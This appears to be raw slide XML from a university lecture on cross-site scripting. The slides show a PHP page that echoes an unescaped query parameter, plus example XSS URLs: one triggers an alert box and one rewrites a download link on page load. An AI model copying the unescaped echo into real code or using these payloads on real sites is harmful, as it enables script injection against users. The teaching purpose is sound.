              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>uery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>string in URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value&amp;name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=value…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>passed on to an application program at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>is how your search request is conveyed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>engine like Google </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For instance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name = $_GET['name']; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"Welcome $name&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;"; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>www.cis.udel.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&gt;Click to Download&lt;/a&gt;"; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cis.udel.edu/~cshen/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>index.php?name=HelloWorld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>script&gt;alert('attacked')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>victim loads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the above URL into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, he will see an alert box which says ‘attacked’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208062711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200" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t>Attack (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For instance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name = $_GET['name']; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"Welcome $name&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;"; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>www.cis.udel.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Click to Download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/a&gt;"; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>can now try to change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>URL” of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Click to Download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>www.cis.udel.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HelloWorld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>window.onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = function() {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.getElementsByTagName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>");link[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>www.usatoday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/";}&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Call the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to execute on “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>window.onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the website (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>i.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>echos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> the given name and then only it draws the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> tag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2581325907"/>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200" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0" smtClean="0"/>
              <a:t>(3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
